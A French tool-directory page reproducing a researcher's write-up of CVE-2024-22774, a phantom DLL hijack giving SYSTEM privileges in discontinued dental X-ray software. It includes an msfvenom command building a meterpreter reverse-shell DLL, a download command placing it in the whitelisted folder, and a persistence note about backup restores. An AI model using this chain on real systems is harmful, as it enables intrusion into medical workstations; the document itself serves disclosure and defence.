Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-22774 — Vulnérabilité furtive d'élévation de privilèges dans un logiciel d'imagerie dentaire panoramique | Kitploit
Outils/GitHubGitHub/gray-0men/cve-2024-22774
Escalade de PrivilègesGénération de PayloadsMécanismes de PersistanceAnalyse des VulnérabilitésExploitationAnalyse de MalwareTests d'IntrusionRed TeamingExploitation de Binaires
GitHubgray-0men/cve-2024-22774

CVE-2024-22774

Vulnérabilité furtive d'élévation de privilèges dans un logiciel d'imagerie dentaire panoramique

1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Panoramic Dental Imaging Software 9.1.2.7600. Détournement de DLL fantôme pour élévation de privilèges (CVE-2024-22774)

Table des matières

  • Table des matières
  • Introduction
  • Version finale du logiciel
  • Recherche de DLL détournables
  • Mise en place de l'attaque
  • Exploit
  • Persistance après installation de l'OS

Introduction

À l'origine, cela devait être un article sur le proxy DLL dans un logiciel de radiographie dentaire, mais je suis tombé sur une DLL au cours de mes recherches qui m'a fait la revérifier, ce qui m'a finalement permis de découvrir une vulnérabilité d'élévation de privilèges qui m'a valu un CVE. Au début de ma carrière technique, je faisais du support technique pour un fabricant d'appareils de radiographie dentaire avant sa fermeture. Je me souviens des bugs qui apparaissaient quand j'y travaillais et j'ai toujours pensé que ce serait une bonne idée d'essayer de trouver des vulnérabilités dans ce logiciel. Donc, étant donné que ce logiciel est encore utilisé aujourd'hui, j'ai décidé de voir si je pouvais en faire quelque chose de sympa maintenant que j'ai quitté le monde du support logiciel. Je me souviens qu'il y a quelque temps, au début de mes études en cybersécurité, il y avait quelques DLL détournables intéressantes dans ce logiciel. J'ai décidé de tenter le proxy DLL pour voir si je pouvais faire exécuter une DLL malveillante tout en gardant ce logiciel fonctionnel (très furtif). Voici le processus que j'ai suivi et comment j'ai découvert par accident une vulnérabilité d'élévation de privilèges qui peut (théoriquement) survivre à un effacement complet et à une réinstallation du système d'exploitation. J'espère que ces informations seront utiles aux Blue Teamers.

Version finale du logiciel

Une chose à noter : ce logiciel ne reçoit plus de mises à jour, mais je sais que les appareils de radiographie sont encore utilisés aux États-Unis aujourd'hui, il existe donc toujours un risque potentiel lié à cette vulnérabilité. Il peut être téléchargé ici ainsi que le manuel du logiciel ici. Autre chose à noter : SI ce logiciel est utilisé, il y a 99 % de chances que les processus qui s'exécutent et les emplacements suivants soient mis sur liste blanche dans l'ERD/AV utilisé, ce qui est également mentionné à la page 24 du manuel du logiciel. Dans cet article, je vais faire de même et ajouter ces exclusions pour correspondre à la façon dont ce logiciel serait installé dans chaque cabinet dentaire.

  1. C:\Program Files (x86)\Panoramic
  2. C:\ProgramData\Ajat

image

Recherche de DLL détournables

Une fois le logiciel installé et les exclusions ajoutées, nous lançons Process Monitor et commençons la recherche. Ajoutez les filtres suivants et redémarrez le « CCS Service » dans Services :

  1. Process Name is ccsservice.exe then Include
  2. Path ends with .dll then Include

Une fois que la liste se remplit, vous remarquerez qu'il y a un tas de DLL détournables dans ce logiciel. Vous verrez de nombreux résultats « NAME NOT FOUND », suivis d'un « SUCCESS » pour la même DLL, simplement dans un emplacement différent immédiatement après. Un jour, je faisais défiler la liste à la recherche d'une bonne candidate à tester en proxy, et presque tout en bas, quelque chose a attiré mon attention...

image

Serait-ce possible ?? C'EST BIEN ÇA. C'est une DLL fantôme invoquée avec l'intégrité SYSTEM depuis un emplacement accessible en écriture par l'utilisateur. Essentiellement, c'est une DLL qui ne conviendrait pas pour du proxy puisqu'aucune DLL réelle ne se trouve sur la machine ; Windows va donc tenter de l'invoquer depuis un ensemble de dossiers prédéfinis dans un ordre spécifique.

  1. Le répertoire à partir duquel l'application a été chargée
  2. Le répertoire système
  3. Le répertoire système 16 bits
  4. Le répertoire Windows
  5. Le répertoire courant
  6. Les répertoires listés dans la variable d'environnement PATH

Et dans notre scénario, le 5e emplacement est C:\ProgramData\Ajat\panoramic\datastor\lnrdlib.dll et sur cet emplacement, tous les utilisateurs ont les permissions de lecture, d'écriture et d'exécution. Pour couronner le tout, cet emplacement est un sous-dossier de C:\ProgramData\Ajat\, qui devrait être sur liste blanche dans tous les environnements où ce logiciel est utilisé.

image

Mise en place de l'attaque

Voici la configuration réseau pour ce test :

  • Kali - 10.0.1.137
  • Windows 10 64x - 10.0.1.128

Commençons par créer une simple DLL meterpreter vanilla, car nous n'avons pas vraiment à nous soucier de l'antivirus, puis lançons un serveur http pour la transférer.

root@kitploit:~
## msfvenom to make dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.137 LPORT=443 -f dll > lnrdlib.dll

## python http server
python3 -m http.server 80

De retour sur Windows, passons sur notre compte utilisateur standard, ouvrons PowerShell, naviguons jusqu'à ce dossier datastor et exécutons ce qui suit : wget http://10.0.1.137/lnrdlib.dll -outfile lnrdlib.dll

image

Exploit

Si tout a été fait correctement, tout ce que nous avons à faire pour déclencher l'exploit est de redémarrer l'ordinateur (comme c'est une action qu'un utilisateur normal peut effectuer, le redémarrage du service CCS déclenchera également ceci).

image

SUCCÈS !!!

Persistance après installation de l'OS

Il faut savoir que l'un des points clés concernant l'emplacement datastor est qu'il s'agit de l'un des deux emplacements qui doivent être sauvegardés au cas où l'ordinateur devrait être effacé ou remplacé pour une raison quelconque, puis le logiciel réinstallé. Si le contenu du dossier calib est perdu, un technicien devra se déplacer pour recalibrer l'appareil de radiographie afin de récupérer ces données. Si les fichiers datastor sont perdus, vous perdez les images radiographiques les plus récentes qui n'avaient pas encore été enregistrées ; la sauvegarde de cet emplacement est donc en quelque sorte facultative. C'est à cet emplacement que le malware résidera, il est donc théoriquement possible que quelqu'un réinfecte accidentellement un ordinateur avec le malware s'il restaure sur le nouvel ordinateur le contenu d'un datastor sauvegardé, qui contenait le malware et toutes ces images radiographiques récentes. Cela est mentionné à la page deux du manuel du logiciel.

image

Télécharger l’outil